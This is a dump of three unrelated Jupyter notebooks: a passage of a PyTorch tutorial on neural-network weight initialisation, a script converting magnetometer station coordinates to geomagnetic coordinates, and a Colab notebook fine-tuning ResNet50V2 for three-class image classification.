num_train = len(train_data)
indices = list(range(num_train))
np.random.shuffle(indices)
split = int(np.floor(valid_size * num_train))
train_idx, valid_idx = indices[split:], indices[:split]
# define samplers for obtaining training and validation batches
# (both loaders wrap train_data; the samplers keep the two index sets disjoint)
train_sampler = SubsetRandomSampler(train_idx)
valid_sampler = SubsetRandomSampler(valid_idx)
# prepare data loaders (combine dataset and sampler)
train_loader = torch.utils.data.DataLoader(train_data, batch_size=batch_size,
                                           sampler=train_sampler, num_workers=num_workers)
valid_loader = torch.utils.data.DataLoader(train_data, batch_size=batch_size,
                                           sampler=valid_sampler, num_workers=num_workers)
test_loader = torch.utils.data.DataLoader(test_data, batch_size=batch_size,
                                          num_workers=num_workers)
# specify the image classes (index i is the label for class i)
classes = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',
           'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']
```
### Visualize Some Training Data
```
import matplotlib.pyplot as plt
%matplotlib inline
# obtain one batch of training images
dataiter = iter(train_loader)
images, labels = dataiter.next()
images = images.numpy()
# plot the images in the batch, along with the corresponding labels
fig = plt.figure(figsize=(25, 4))
for idx in np.arange(20):
ax = fig.add_subplot(2, 20/2, idx+1, xticks=[], yticks=[])
ax.imshow(np.squeeze(images[idx]), cmap='gray')
ax.set_title(classes[labels[idx]])
```
## Define the Model Architecture
We've defined the MLP that we'll use for classifying the dataset.
### Neural Network
<img style="float: left" src="https://raw.githubusercontent.com/udacity/deep-learning-v2-pytorch/master/weight-initialization/notebook_ims/neural_net.png" width=50%/>
* A 3 layer MLP with hidden dimensions of 256 and 128.
* This MLP accepts a flattened image (784-value long vector) as input and produces 10 class scores as output.
---
We'll test the effect of different initial weights on this 3 layer neural network with ReLU activations and an Adam optimizer.
The lessons you learn apply to other neural networks, including different activations and optimizers.
---
## Initialize Weights
Let's start looking at some initial weights.
### All Zeros or Ones
If you follow the principle of [Occam's razor](https://en.wikipedia.org/wiki/Occam's_razor), you might think setting all the weights to 0 or 1 would be the best solution. This is not the case.
With every weight the same, all the neurons at each layer are producing the same output. This makes it hard to decide which weights to adjust.
Let's compare the loss with all ones and all zero weights by defining two models with those constant weights.
Below, we are using PyTorch's [nn.init](https://pytorch.org/docs/stable/nn.html#torch-nn-init) to initialize each Linear layer with a constant weight. The init library provides a number of weight initialization functions that give you the ability to initialize the weights of each layer according to layer type.
In the case below, we look at every layer/module in our model. If it is a Linear layer (as all three layers are for this MLP), then we initialize those layer weights to be a `constant_weight` with bias=0 using the following code:
>```
if isinstance(m, nn.Linear):
nn.init.constant_(m.weight, constant_weight)
nn.init.constant_(m.bias, 0)
```
The `constant_weight` is a value that you can pass in when you instantiate the model.
```
import torch.nn as nn
import torch.nn.functional as F
# define the NN architecture
class Net(nn.Module):
    """3-layer MLP classifier: 784 -> hidden_1 -> hidden_2 -> 10.

    Accepts a flattened 28x28 image and returns raw class scores (no softmax).
    If ``constant_weight`` is given, every Linear layer is initialized to that
    constant with zero bias; otherwise PyTorch's default init is kept.
    """

    def __init__(self, hidden_1=256, hidden_2=128, constant_weight=None):
        super(Net, self).__init__()
        # fully-connected stack (784 -> hidden_1 -> hidden_2 -> 10)
        self.fc1 = nn.Linear(28 * 28, hidden_1)
        self.fc2 = nn.Linear(hidden_1, hidden_2)
        self.fc3 = nn.Linear(hidden_2, 10)
        # one dropout module (p=0.2), reused after each hidden layer
        self.dropout = nn.Dropout(0.2)
        # optionally overwrite every Linear layer with a constant weight
        if constant_weight is not None:
            for module in self.modules():
                if isinstance(module, nn.Linear):
                    nn.init.constant_(module.weight, constant_weight)
                    nn.init.constant_(module.bias, 0)

    def forward(self, x):
        # flatten the image input into a 784-long vector
        flat = x.view(-1, 28 * 28)
        # hidden layers: Linear -> ReLU -> Dropout, twice
        hidden = self.dropout(F.relu(self.fc1(flat)))
        hidden = self.dropout(F.relu(self.fc2(hidden)))
        # output layer: raw scores, to be paired with a cross-entropy loss
        return self.fc3(hidden)
```
### Compare Model Behavior
Below, we are using `helpers.compare_init_weights` to compare the training and validation loss for the two models we defined above, `model_0` and `model_1`. This function takes in a list of models (each with different initial weights), the name of the plot to produce, and the training and validation dataset loaders. For each given model, it will plot the training loss for the first 100 batches and print out the validation accuracy after 2 training epochs. *Note: if you've used a small batch_size, you may want to increase the number of epochs here to better compare how models behave after seeing a few hundred images.*
We plot the loss over the first 100 batches to better judge which model weights performed better at the start of training. **I recommend that you take a look at the code in `helpers.py` to look at the details behind how the models are trained, validated, and compared.**
Run the cell below to see the difference between weights of all zeros against all ones.
```
# initialize two NN's with 0 and 1 constant weights
model_0 = Net(constant_weight=0)
model_1 = Net(constant_weight=1)
import helpers
# put them in list form to compare
model_list = [(model_0, 'All Zeros'),
              (model_1, 'All Ones')]
# plot the loss over the first 100 batches and print validation accuracy
# after 2 epochs (see helpers.py for the training/validation details)
helpers.compare_init_weights(model_list,
                             'All Zeros vs All Ones',
                             train_loader,
                             valid_loader)
```
As you can see the accuracy is close to guessing for both zeros and ones, around 10%.
The neural network is having a hard time determining which weights need to be changed, since the neurons have the same output for each layer. To avoid neurons with the same output, let's use unique weights. We can also randomly select these weights to avoid being stuck in a local minimum for each run.
A good solution for getting these random weights is to sample from a uniform distribution.
### Uniform Distribution
A [uniform distribution](https://en.wikipedia.org/wiki/Uniform_distribution) has the equal probability of picking any number from a set of numbers. We'll be picking from a continuous distribution, so the chance of picking the same number is low. We'll use NumPy's `np.random.uniform` function to pick random numbers from a uniform distribution.
>#### [`np.random.uniform(low=0.0, high=1.0, size=None)`](https://docs.scipy.org/doc/numpy/reference/generated/numpy.random.uniform.html)
>Outputs random values from a uniform distribution.
>The generated values follow a uniform distribution in the range [low, high). The lower bound low is included in the range, while the upper bound high is excluded.
>- **low:** The lower bound on the range of random values to generate. Defaults to 0.
- **high:** The upper bound on the range of random values to generate. Defaults to 1.
- **size:** An int or tuple of ints that specify the shape of the output array.
We can visualize the uniform distribution by using a histogram. Let's map the values from `np.random.uniform(-3, 3, [1000])` to a histogram using the `helpers.hist_dist` function. This will be `1000` random float values from `-3` to `3`, excluding the value `3`.
```
# draw 1000 samples from U(-3, 3) and plot them as a histogram
helpers.hist_dist('Random Uniform (low=-3, high=3)', np.random.uniform(-3, 3, [1000]))
```
The histogram used 500 buckets for the 1000 values. Since the chance for any single bucket is the same, there should be around 2 values for each bucket. That's exactly what we see with the histogram. Some buckets have more and some have less, but they trend around 2.
Now that you understand the uniform function, let's use PyTorch's `nn.init` to apply it to a model's initial weights.
### Uniform Initialization, Baseline
Let's see how well the neural network trains using a uniform weight initialization, where `low=0.0` and `high=1.0`. Below, I'll show you another way (besides in the Net class code) to initialize the weights of a network. To define weights outside of the model definition, you can:
>1. Define a function that assigns weights by the type of network layer, *then*
2. Apply those weights to an initialized model using `model.apply(fn)`, which applies a function to each model layer.
This time, we'll use `weight.data.uniform_` to initialize the weights of our model, directly.
```
# takes in a module and applies the specified weight initialization
def weights_init_uniform(m):
    """Initialize every Linear layer with U[0, 1) weights and zero bias."""
    layer_type = m.__class__.__name__
    # for every Linear layer in a model..
    if 'Linear' in layer_type:
        # weights drawn uniformly from [0.0, 1.0)
        m.weight.data.uniform_(0.0, 1.0)
        # biases start at zero
        m.bias.data.fill_(0)
# create a new model with these weights
model_uniform = Net()
model_uniform.apply(weights_init_uniform)
# evaluate behavior (loss over first 100 batches + validation accuracy)
helpers.compare_init_weights([(model_uniform, 'Uniform Weights')],
                             'Uniform Baseline',
                             train_loader,
                             valid_loader)
# print the class name of every module, as a sanity check of the structure
model_uniform.apply(lambda x: print(x.__class__.__name__))
```
---
The loss graph is showing the neural network is learning, which it didn't with all zeros or all ones. We're headed in the right direction!
## General rule for setting weights
The general rule for setting the weights in a neural network is to set them to be close to zero without being too small.
>Good practice is to start your weights in the range of $[-y, y]$ where $y=1/\sqrt{n}$
($n$ is the number of inputs to a given neuron).
Let's see if this holds true; let's create a baseline to compare with and center our uniform range over zero by shifting it over by 0.5. This will give us the range [-0.5, 0.5).
```
# takes in a module and applies the specified weight initialization
def weights_init_uniform_center(m):
    """Initialize every Linear layer with U[-0.5, 0.5) weights and zero bias."""
    # for every Linear layer in a model..
    if 'Linear' in m.__class__.__name__:
        # zero-centered uniform weights
        m.weight.data.uniform_(-0.5, 0.5)
        # zero biases
        m.bias.data.fill_(0)
# create a new model with these weights
# (apply() walks every submodule, so all three Linear layers get re-initialized)
model_centered = Net()
model_centered.apply(weights_init_uniform_center)
```
Then let's create a distribution and model that uses the **general rule** for weight initialization; using the range $[-y, y]$, where $y=1/\sqrt{n}$ .
And finally, we'll compare the two models.
```
# takes in a module and applies the specified weight initialization
def weights_init_uniform_rule(m):
    """Initialize Linear layers with the general rule U[-y, y), y = 1/sqrt(n_inputs)."""
    # for every Linear layer in a model..
    if 'Linear' in m.__class__.__name__:
        # bound scales inversely with the number of inputs to the layer
        bound = 1.0 / np.sqrt(m.in_features)
        m.weight.data.uniform_(-bound, bound)
        # zero biases
        m.bias.data.fill_(0)
# create a new model with these weights
model_rule = Net()
model_rule.apply(weights_init_uniform_rule)
# compare these two models
model_list = [(model_centered, 'Centered Weights [-0.5, 0.5)'),
              (model_rule, 'General Rule [-y, y)')]
# evaluate behavior (loss curves over first 100 batches + validation accuracy)
helpers.compare_init_weights(model_list,
                             '[-0.5, 0.5) vs [-y, y)',
                             train_loader,
                             valid_loader)
```
This behavior is really promising! Not only is the loss decreasing, but it seems to do so very quickly for our uniform weights that follow the general rule; after only two epochs we get a fairly high validation accuracy and this should give you some intuition for why starting out with the right initial weights can really help your training process!
---
Since the uniform distribution has the same chance to pick *any value* in a range, what if we used a distribution that had a higher chance of picking numbers closer to 0? Let's look at the normal distribution.
### Normal Distribution
Unlike the uniform distribution, the [normal distribution](https://en.wikipedia.org/wiki/Normal_distribution) has a higher likelihood of picking numbers close to its mean. To visualize it, let's plot values from NumPy's `np.random.normal` function to a histogram.
>[np.random.normal(loc=0.0, scale=1.0, size=None)](https://docs.scipy.org/doc/numpy/reference/generated/numpy.random.normal.html)
>Outputs random values from a normal distribution.
>- **loc:** The mean of the normal distribution.
- **scale:** The standard deviation of the normal distribution.
- **size:** The shape of the output array.
```
# draw 1000 samples from N(0, 1) and plot them as a histogram
helpers.hist_dist('Random Normal (mean=0.0, stddev=1.0)', np.random.normal(size=[1000]))
```
Let's compare the normal distribution against the previous, rule-based, uniform distribution.
<a id='normalex'></a>
#### TODO: Define a weight initialization function that gets weights from a normal distribution
> The normal distribution should have a mean of 0 and a standard deviation of $y=1/\sqrt{n}$
```
## complete this function
def weights_init_normal(m):
    '''Takes in a module and initializes all linear layers with weight
       values taken from a normal distribution with mean 0 and
       standard deviation y = 1/sqrt(n_inputs); biases are set to 0.'''
    classname = m.__class__.__name__
    # for every Linear layer in a model
    if classname.find('Linear') != -1:
        # std dev follows the general rule: 1 / sqrt(number of inputs)
        n = m.in_features
        y = 1.0 / np.sqrt(n)
        # m.weight.data taken from a normal distribution N(0, y)
        m.weight.data.normal_(0.0, y)
        # m.bias.data set to 0
        m.bias.data.fill_(0)

## -- no need to change code below this line -- ##
# create a new model with the rule-based, uniform weights
model_uniform_rule = Net()
model_uniform_rule.apply(weights_init_uniform_rule)
# create a new model with the rule-based, NORMAL weights
model_normal_rule = Net()
model_normal_rule.apply(weights_init_normal)
# compare the two models
model_list = [(model_uniform_rule, 'Uniform Rule [-y, y)'),
              (model_normal_rule, 'Normal Distribution')]
# evaluate behavior (loss over first 100 batches + validation accuracy)
helpers.compare_init_weights(model_list,
                             'Uniform vs Normal',
                             train_loader,
                             valid_loader)
```
The normal distribution gives us pretty similar behavior compared to the uniform distribution, in this case. This is likely because our network is so small; a larger neural network will pick more weight values from each of these distributions, magnifying the effect of both initialization styles. In general, a normal distribution will result in better performance for a model.
---
### Automatic Initialization
Let's quickly take a look at what happens *without any explicit weight initialization*.
```
## Instantiate a model with _no_ explicit weight initialization
## evaluate the behavior using helpers.compare_init_weights
```
As you complete this exercise, keep in mind these questions:
* What initialization strategy has the lowest training loss after two epochs? What about highest validation accuracy?
* After testing all these initial weight options, which would you decide to use in a final classification model?
| github_jupyter |
## CGM Coordinates
Convert station coordinates from latitude and longitude to altitude adjusted corrected geomagnetic coordinates.
This is written as a notebook instead of a part of utils.py as it requires IGRF12 and AACGMv2 which can be tricky to install (at least in windows).
- cgm lat
- cmg lon
- mlt at 0 UT
- declination
- L-shell dipole
- L-shell Geopack IGRF
```
import igrf12
import aacgmv2
import pandas as pd
import numpy as np
import datetime as datetime
# Years to generate station tables for, and the reference altitude for the
# corrected geomagnetic (CGM) conversion.
year = np.arange(1990,2000,1)
alt_km = 100.
stn_f = "..\\gmag\\Stations\\station_list.csv"
year
# One pass per year: derive CGM coordinates / MLT / L-shell for every station
# and write a per-year CSV.
for yr in year:
    dt = pd.to_datetime(str(yr))
    # re-read the station list each iteration so df starts fresh every year
    df = pd.read_csv(stn_f, header=None, skiprows=1,
                     names = ['array','code','name','latitude','longitude'])
    # pre-allocate one value per station
    decl = np.zeros(df.shape[0])
    cgm_lat = np.zeros(df.shape[0])
    cgm_lon = np.zeros(df.shape[0])
    l_dip = np.zeros(df.shape[0])
    mlt = np.zeros(df.shape[0])
    mlt_ut = np.zeros(df.shape[0])
    # get declination, cgm coords, l-shell
    for index, row in df.iterrows():
        mag = igrf12.igrf(dt,glat=row['latitude'],glon=row['longitude'],alt_km=alt_km)
        # geographic -> CGM ('G2A' direction)
        cgm_lat[index], cgm_lon[index], cgm_r = aacgmv2.convert_latlon(row['latitude'],row['longitude'], alt_km,dt,code='G2A')
        # wrap CGM longitude into [0, 360)
        if cgm_lon[index] <0:
            cgm_lon[index] = 360+cgm_lon[index]
        # MLT of the station at 0 UT on Jan 1 of the year
        mlt_ut[index] = aacgmv2.convert_mlt(cgm_lon[index],datetime.datetime(int(yr),1,1,0,0,0),m2a=False)
        # UT of local magnetic midnight
        mlt[index] = 24- mlt_ut[index]
        # dipole L-shell: L = 1 / cos^2(CGM latitude)
        l_dip[index] = 1./(np.cos(np.deg2rad(cgm_lat[index]))**2.)
        decl[index] = mag['decl'].values[0]
        # progress/sanity print for one reference station
        if row['code'] == 'GILL':
            print(yr,index,decl[index],cgm_lat[index],cgm_lon[index],l_dip[index])
    # attach the derived columns and write the yearly table
    df['cgm_latitude'] = cgm_lat
    df['cgm_longitude'] = cgm_lon
    df['declination'] = decl
    df['lshell'] = l_dip
    df['mlt_midnight'] = mlt
    df['mlt_ut'] = mlt_ut
    fn = '..\\gmag\\Stations\\{0:04d}_station_cgm.txt'.format(int(yr))
    df.to_csv(fn,index=False,float_format="%E", na_rep='NaN')
```
```
# print the station DataFrame
df.head()
# Get only the Gill entry
df[df['code'] == 'GILL']
# Get all entries between L of 3 and 7
# list the array, code, cgm longitude and l-shell
# allow pandas to print all output
pd.set_option('display.max_rows', None)
df[(df['lshell']>3) & (df['lshell']<7)][['array','code','cgm_longitude','lshell']]
# Get all stations with L greater than 7
df[(df['lshell']>7)][['array','code','cgm_longitude','lshell']]
import pandas as pd
# Re-export the yearly CGM tables (2000-2019) as CSVs for the docs site,
# with reduced float precision.
for yr in range(2000,2020):
    print(yr)
    fn = '..\\gmag\\Stations\\{0:04d}_station_cgm.txt'.format(int(yr))
    df = pd.read_csv(fn)
    fn = 'D:\\GitHub\\gmag\\docs\\_data\\{0:04d}_station_cgm.csv'.format(int(yr))
    df.to_csv(fn,index=False,float_format="%.2f", na_rep='NaN')
```
| github_jupyter |
```
import tensorflow as tf
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
from sklearn.model_selection import train_test_split
from tensorflow.keras.layers import Conv2D,Flatten,MaxPool2D,BatchNormalization,GlobalAveragePooling2D, Dense, Dropout
from tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.preprocessing.image import ImageDataGenerator
import os
from tensorflow.keras.applications import ResNet50V2
from sklearn.metrics import confusion_matrix, classification_report
import seaborn as sns
sns.set_style('darkgrid')
from keras.models import load_model
```
```
from google.colab import drive
drive.mount('/content/drive')
# Split files are space-separated with columns: patient id, image path, label,
# data source; only path and label are kept.
train_df = pd.read_csv('/content/drive/MyDrive/COURSES/CS231/train_split.txt', sep=" ", header=None)
train_df.columns = ['patient id', 'file_paths', 'labels', 'data source']
train_df = train_df.drop(['patient id', 'data source'], axis=1)
train_df.head()
test_df = pd.read_csv('/content/drive/MyDrive/COURSES/CS231/test_split.txt', sep=" ", header=None)
test_df.columns = ['patient id', 'file_paths', 'labels', 'data source']
test_df = test_df.drop(['patient id', 'data source'], axis=1)
test_df.head()
# Image directories corresponding to the split files above.
TRAIN_PATH = "/content/drive/MyDrive/COURSES/CS231/data/train"
TEST_PATH = "/content/drive/MyDrive/COURSES/CS231/data/test"
```
# Balancing Classes
```
train_df['labels'].value_counts()
# Undersample each class to file_count rows (presumably the size of the
# smallest class shown by value_counts above — confirm against the data).
file_count = 4649
samples = []
for category in train_df['labels'].unique():
    category_slice = train_df.query("labels == @category")
    samples.append(category_slice.sample(file_count, replace=False, random_state=1))
# concatenate the balanced samples and shuffle them (frac=1.0 = full reshuffle)
train_df = pd.concat(samples, axis=0).sample(frac=1.0, random_state=1).reset_index(drop=True)
print(train_df['labels'].value_counts())
print(len(train_df))
```
# Spliting train_df into train_df and valid_df
```
# Hold out 10% of the balanced training frame for validation.
train_df, valid_df = train_test_split(train_df, train_size=0.9, random_state=0)
print(train_df.labels.value_counts())
print(valid_df.labels.value_counts())
print(test_df.labels.value_counts())
```
# Image Data Generators
```
batch_size = 32
img_height = 224
img_width = 224
target_size = (img_height, img_width)
# Augmentation (flip + small zoom) only on training data; both generators
# apply the ResNetV2 preprocessing expected by the pretrained backbone.
train_datagen = ImageDataGenerator(preprocessing_function=tf.keras.applications.resnet_v2.preprocess_input,
                                   horizontal_flip=True, zoom_range=0.1)
test_datagen = ImageDataGenerator(preprocessing_function=tf.keras.applications.resnet_v2.preprocess_input)
train_generator = train_datagen.flow_from_dataframe(train_df, directory=TRAIN_PATH, x_col='file_paths', y_col='labels',
                                                    target_size=target_size, batch_size=batch_size, color_mode='rgb', class_mode='categorical')
valid_generator = test_datagen.flow_from_dataframe(valid_df, directory=TRAIN_PATH, x_col='file_paths', y_col='labels',
                                                   target_size=target_size, batch_size=batch_size, color_mode='rgb', class_mode='categorical')
# shuffle=False so predictions stay aligned with test_generator.labels
test_generator = test_datagen.flow_from_dataframe(test_df, directory=TEST_PATH, x_col='file_paths', y_col='labels',
                                                  target_size=target_size, batch_size=batch_size, color_mode='rgb', class_mode='categorical', shuffle = False)
```
# Create Model
```
# ImageNet-pretrained ResNet50V2 backbone without its classification head.
base_model = ResNet50V2(include_top=False, weights="imagenet", input_shape=(img_height, img_width, 3))
# Freeze the first 190 layers; the remaining layers are fine-tuned.
for layer in base_model.layers[:190]:
    layer.trainable = False
# print which backbone layers are trainable, as a sanity check
for i, layer in enumerate(base_model.layers):
    print(i, layer.name, "-", layer.trainable)
# Classification head: Flatten + three Dense blocks (BN -> Dense -> Dropout)
# ending in a 3-way softmax.
model = tf.keras.Sequential([
    base_model,
    Flatten(),
    BatchNormalization(),
    Dense(256, activation='relu'),
    Dropout(0.5),
    BatchNormalization(),
    Dense(128, activation='relu'),
    Dropout(0.5),
    BatchNormalization(),
    Dense(64, activation='relu'),
    Dropout(0.5),
    BatchNormalization(),
    Dense(3, activation='softmax'),
])
lr = 5e-3
model.compile(loss='categorical_crossentropy', optimizer=Adam(learning_rate=lr), metrics=['accuracy'])
model.summary()
```
# Callbacks
```
# Epochs of no val_loss improvement before the learning rate is reduced.
patience = 10
# stop_patience = 10
factor = 0.1
callbacks = [
    # keep only the checkpoint with the best (lowest) monitored val_loss
    ModelCheckpoint("resnet50v2-final.h5", save_best_only=True, verbose = 0),
    # EarlyStopping(patience=stop_patience, monitor='val_loss', verbose=1),
    # multiply the LR by `factor` when val_loss plateaus, down to 1e-6
    ReduceLROnPlateau(monitor='val_loss', factor=factor, patience=patience, min_lr=1e-6, verbose=1)
]
```
# Model Training
```
epochs = 50
history = model.fit(train_generator, validation_data=valid_generator, epochs=epochs, callbacks=callbacks, verbose=1)
# NOTE(review): the loss plot below uses these hard-coded lists (apparently
# pasted from a previous 50-epoch run) instead of history.history — confirm
# this is intentional; the accuracy plot further down does use `history`.
train_loss = [0.6487, 0.4469, 0.4074, 0.3849, 0.3576, 0.3427, 0.3471, 0.3380, 0.3410, 0.3383, 0.3361, 0.2940, 0.2783, 0.2717, 0.26, 0.2624, 0.2369, 0.2470, 0.2358, 0.2311, 0.2263, 0.2218, 0.2233, 0.2167, 0.2231, 0.2227, 0.2213, 0.2096, 0.2241, 0.2239, 0.2176, 0.2176, 0.2072, 0.2219, 0.2164, 0.2101, 0.2049, 0.2178, 0.2090, 0.2152, 0.2185, 0.2181, 0.2128, 0.2176, 0.2096, 0.2130, 0.2160, 0.2083, 0.2108, 0.2143]
val_loss = [0.3612, 0.3654, 0.6374, 0.3819, 0.5943, 1.1585, 0.4505, 0.4302, 0.5506, 0.6574, 1.1695, 1.3079, 1.7884, 3.1584, 5.1392, 4.6225, 4.8016, 4.9733, 4.8234, 5.7820, 6.4980, 4.4179, 4.2063, 4.1806, 4.2003, 5.5932, 1.5663, 1.1069, 3.2203, 2.6253, 3.3542, 4.0708, 4.2337, 5.4792, 4.8195, 3.8897, 4.0073, 4.3476, 5.2787, 5.0320, 5.5412, 3.6614, 3.8046, 4.0843, 3.6718, 3.9051, 4.3147, 4.5132, 6.02, 4.8454]
plt.plot(train_loss, label='Loss (training data)')
plt.plot(val_loss, label='Loss (validation data)')
plt.title('Loss for Training')
plt.ylabel('Loss')
plt.xlabel('No. epoch')
plt.legend(['train', 'validation'], loc="upper left")
plt.savefig('/content/drive/MyDrive/COURSES/CS231/results/resnet50_50-1')
plt.show()
# Accuracy curves from the run just completed.
plt.plot(history.history['accuracy'])
plt.plot(history.history['val_accuracy'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'validation'], loc='upper left')
# NOTE(review): saved to a local relative path, unlike the Drive path above —
# confirm 'plot/' exists in the runtime or the call will fail.
plt.savefig("plot/resnet50_plot.png")
plt.show()
```
# Predictions on Test Set
```
# Reload the best checkpoint saved by ModelCheckpoint into the same
# architecture, then evaluate and predict on the (unshuffled) test set.
best_model = model
best_model.load_weights('/content/drive/MyDrive/COURSES/CS231/resnet50v2-final.h5')
best_model.evaluate(test_generator)
preds = best_model.predict(test_generator)
def print_info( test_gen, preds, print_code, save_dir, subject ):
    """Summarize test-set predictions.

    Writes the {class index: class name} map to a text file in ``save_dir``,
    optionally prints up to ``print_code`` misclassified files, draws a
    bar chart of errors per class, and — when there are at most 30 classes —
    shows a confusion matrix and prints a classification report.

    Args:
        test_gen: generator exposing ``class_indices``, ``labels`` and
            ``filenames`` (e.g. a Keras directory iterator) in prediction order.
        preds: array-like of per-sample class-probability vectors.
        print_code: maximum number of misclassified files to print (0 = none).
        save_dir: directory that receives the class-map text file.
        subject: filename prefix for the class-map text file.
    """
    class_dict = test_gen.class_indices
    labels = test_gen.labels
    file_names = test_gen.filenames
    error_list = []
    true_class = []
    pred_class = []
    prob_list = []
    new_dict = {}
    error_indices = []
    y_pred = []
    for key, value in class_dict.items():
        new_dict[value] = key  # dictionary {integer of class number: string of class name}
    # store new_dict as a text file in the save_dir
    classes = list(new_dict.values())  # list of string of class names
    dict_as_text = str(new_dict)
    dict_name = subject + '-' + str(len(classes)) + '.txt'
    dict_path = os.path.join(save_dir, dict_name)
    with open(dict_path, 'w') as x_file:
        x_file.write(dict_as_text)
    errors = 0
    for i, p in enumerate(preds):
        pred_index = np.argmax(p)
        true_index = labels[i]  # labels are integer values
        if pred_index != true_index:  # a misclassification has occurred
            error_list.append(file_names[i])
            true_class.append(new_dict[true_index])
            pred_class.append(new_dict[pred_index])
            prob_list.append(p[pred_index])
            error_indices.append(true_index)
            errors = errors + 1
        y_pred.append(pred_index)
    if print_code != 0:
        if errors > 0:
            # Print at most `print_code` of the misclassified files.
            if print_code > errors:
                r = errors
            else:
                r = print_code
            msg = '{0:^28s}{1:^28s}{2:^28s}{3:^16s}'.format('Filename', 'Predicted Class' , 'True Class', 'Probability')
            print_in_color(msg, (0,255,0), (55,65,80))
            for i in range(r):
                msg = '{0:^28s}{1:^28s}{2:^28s}{3:4s}{4:^6.4f}'.format(error_list[i], pred_class[i], true_class[i], ' ', prob_list[i])
                print_in_color(msg, (255,255,255), (55,65,60))
        else:
            msg = 'With accuracy of 100 % there are no errors to print'
            print_in_color(msg, (0,255,0), (55,65,80))
    # BUG FIX: fig1 used to be created only inside the `errors > 0` branch but
    # saved unconditionally at the end, raising NameError on a perfect test set.
    fig1 = None
    if errors > 0:
        plot_bar = []
        plot_class = []
        for key, value in new_dict.items():
            count = error_indices.count(key)
            if count != 0:
                plot_bar.append(count)  # how many times class `key` was misclassified
                plot_class.append(value)  # the corresponding class name
        fig1 = plt.figure()
        fig1.set_figheight(len(plot_class) / 3)
        fig1.set_figwidth(10)
        plt.style.use('fivethirtyeight')
        for i in range(0, len(plot_class)):
            c = plot_class[i]
            x = plot_bar[i]
            plt.barh(c, x, )
        plt.title( ' Errors by Class on Test Set')
    if len(classes) <= 30:
        # create a confusion matrix and a test report
        y_true = np.array(labels)
        y_pred = np.array(y_pred)
        cm = confusion_matrix(y_true, y_pred)
        clr = classification_report(y_true, y_pred, target_names=classes)
        length = len(classes)
        # Scale the figure with the number of classes, with a sane minimum.
        if length < 8:
            fig_width = 8
            fig_height = 8
        else:
            fig_width = int(length * .5)
            fig_height = int(length * .5)
        fig2 = plt.figure(figsize=(fig_width, fig_height))
        sns.heatmap(cm, annot=True, vmin=0, fmt='g', cmap='Blues', cbar=False)
        plt.xticks(np.arange(length) + .5, classes, rotation=90)
        plt.yticks(np.arange(length) + .5, classes, rotation=0)
        plt.xlabel("Predicted")
        plt.ylabel("Actual")
        plt.title("Confusion Matrix")
        plt.savefig("/content/drive/MyDrive/COURSES/CS231/results/resnet50_50-4.png", dpi = 100)
        plt.show()
        print("Classification Report:\n----------------------\n", clr)
    if fig1 is not None:  # only save the errors-by-class chart if it was drawn
        fig1.savefig("/content/drive/MyDrive/COURSES/CS231/results/resnet50_50-3.png", dpi = 100)
# Run the test-set analysis: save the class map under `save_dir` with the
# `subject` prefix; print_code=0 suppresses the per-file misclassification
# listing (plots and the classification report are still produced).
save_dir = '/content/drive/MyDrive/COURSES/CS231'
subject = "kq"
print_code = 0
print_info(test_generator, preds, print_code, save_dir, subject)
```
| github_jupyter |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.